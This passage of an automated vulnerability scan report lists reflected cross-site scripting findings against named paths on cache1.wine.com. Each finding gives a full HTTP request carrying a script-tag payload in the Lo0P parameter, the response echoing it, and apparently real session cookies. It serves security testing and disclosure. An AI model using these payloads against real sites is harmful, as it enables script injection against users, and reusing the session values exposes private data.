This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingST.gif?Lo0P=c2a1f<script>alert(1)</script>8dad4a9f8d2 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingST.gif?Lo0P=c2a1f<script>alert(1)</script>8dad4a9f8d2 was not found on this server.<P>
...[SNIP]...

1.78. http://cache1.wine.com/images/ratingWS.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingWS.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6a08e<script>alert(1)</script>3e83de815ed was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWS.gif?Lo0P=6a08e<script>alert(1)</script>3e83de815ed HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWS.gif?Lo0P=6a08e<script>alert(1)</script>3e83de815ed was not found on this server.<P>
...[SNIP]...

1.79. http://cache1.wine.com/images/stewardship/stewardship_guy_small.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/stewardship/stewardship_guy_small.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 13ebd<script>alert(1)</script>59fb5a67311 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/stewardship/stewardship_guy_small.gif?Lo0P=13ebd<script>alert(1)</script>59fb5a67311 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 280
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/stewardship/stewardship_guy_small.gif?Lo0P=13ebd<script>alert(1)</script>59fb5a67311 was not found on this server.<P>
...[SNIP]...

1.80. http://cache1.wine.com/includes/css/defaultsixC.css [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload aac4a<script>alert(1)</script>5082988028e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/css/defaultsixC.css?v=634305316255490024&Lo0P=aac4a<script>alert(1)</script>5082988028e HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 285
Date: Mon, 14 Feb 2011 17:16:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /includes/css/defaultsixC.css?v=634305316255490024&Lo0P=aac4a<script>alert(1)</script>5082988028e was not found on this server.<P>
...[SNIP]...

1.81. http://cache1.wine.com/labels/102367m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/102367m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 62df8<script>alert(1)</script>1662841db6b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/102367m.jpg?Lo0P=62df8<script>alert(1)</script>1662841db6b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/102367m.jpg?Lo0P=62df8<script>alert(1)</script>1662841db6b was not found on this server.<P>
...[SNIP]...

1.82. http://cache1.wine.com/labels/105835m.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/105835m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c1ed1<script>alert(1)</script>c02641efb91 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/105835m.jpg?Lo0P=c1ed1<script>alert(1)</script>c02641efb91 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/105835m.jpg?Lo0P=c1ed1<script>alert(1)</script>c02641efb91 was not found on this server.<P>
...[SNIP]...

1.83. http://cache1.wine.com/labels/108120m.jpg [Lo0P parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/108120m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 37aab<script>alert(1)</script>556d3b6bc7c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108120m.jpg?Lo0P=37aab<script>alert(1)</script>556d3b6bc7c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108120m.jpg?Lo0P=37aab<script>alert(1)</script>556d3b6bc7c was not found on this server.<P>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 11:20:15 CST 2011.